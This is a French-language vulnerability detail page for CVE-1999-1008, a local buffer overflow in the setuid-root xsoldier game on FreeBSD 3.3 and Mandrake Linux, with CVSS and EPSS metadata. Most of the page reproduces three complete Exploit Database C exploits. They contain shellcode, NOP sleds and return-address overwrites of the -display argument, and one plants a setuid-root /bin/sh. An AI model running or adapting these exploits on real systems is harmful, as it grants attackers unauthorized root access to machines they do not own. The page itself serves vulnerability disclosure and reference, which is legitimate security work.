CVE-1999-1008 : Détail

CVE-1999-1008

0.04%V3
Local
2000-04-18
02h00 +00:00
2024-08-01
16h55 +00:00

Descriptions du CVE

The xsoldier program allows local users to gain root access via a long argument.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19676

Date de publication : 2000-05-16 22h00 +00:00
Auteur : Brock Tellier
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string. The user does not have to have a valid $DISPLAY to exploit this. /* * xsoldier exploit for Freebsd-3.3-RELEASE * Drops a suid root shell in /bin/sh * Brock Tellier btellier@usa.net */ #include <stdio.h> char shell[]= /* mudge@l0pht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n" void buildui() { FILE *fp; char cc[100]; fp = fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); system(cc); } main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4400; char buf[bsize]; int eip = 0xbfbfdb65; /* works for me */ buildui(); if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\n"); fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4325; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; 
buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize]='\0'; execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL); }
Exploit Database EDB-ID : 19677

Date de publication : 2000-05-16 22h00 +00:00
Auteur : Larry W. Cashdollar
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string. The user does not have to have a valid $DISPLAY to exploit this. */ /*Larry W. Cashdollar linux xsolider exploit. *lwc@vapid.dhs.org http://vapid.dhs.org *if xsolider is built and installed from its source it will be installed *setuid root in /usr/local/games *original exploit found by brock tellier for freebsd 3.3 ports packages. *If a setregid() call is placed in the shellcode, you can get egid=12 *with the default mandrake installation.*/ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 4480 /*our buffersize. 
*/ char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */ "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i, offset; long retaddr = get_sp (); if (argc <= 1) offset = 0; else offset = atoi (argv[1]); /*#Copy the NOPs in to the buffer leaving space for shellcode and #pointers*/ for (i = 0; i < (LEN - strlen (shellcode) - 100); i++) *(buffer + i) = NOP; /*[NNNNNNNNNNNNNNNNNNNNN ]*/ /* ^-- LEN -(strlen(shellcode)) - 35*/ /*#Copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/ /* ^-(buffer+i) */ /*#Fill the buffer with our new address to jump to esp + offset */ for (i = i + strlen (shellcode); i < LEN; i += 4) *(long *) &buffer[i] = retaddr+offset; /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/ /* ^-(i+strlen(shellcode))*/ printf ("Jumping to address %x BufSize %d\n", retaddr + offset, LEN); execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0); }
Exploit Database EDB-ID : 229

Date de publication : 2000-12-14 23h00 +00:00
Auteur : zorgon
EDB Vérifié : Yes

#include <stdio.h> #include <stdlib.h> #define NOP 0x90 #define BUFSIZE 4408 #define OFFSET 0 #define RANGE 20 unsigned char blah[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91"; long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[BUFSIZE]; int i, offset; unsigned long ret; if (argc > 1) offset = atoi(argv[1]); else offset = OFFSET; for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++) *(buffer + i) = NOP; memcpy (buffer + i, blah, strlen (blah)); ret = get_sp(); for (i = i + strlen (blah); i < BUFSIZE; i += 4) *(long *) &buffer[i] = ret+offset; fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n"); fprintf(stderr, "zorgon@antionline.org\n"); fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); execl ("./xsoldier", "xsoldier", "-display", buffer, 0); } // milw0rm.com [2000-12-15]

Products Mentioned

Configuration 0

Freebsd>>Freebsd >> Version 3.3

Mandrakesoft>>Mandrake_linux >> Version 7.0

Références

http://www.securityfocus.com/bid/871
Tags : vdb-entry, x_refsource_BID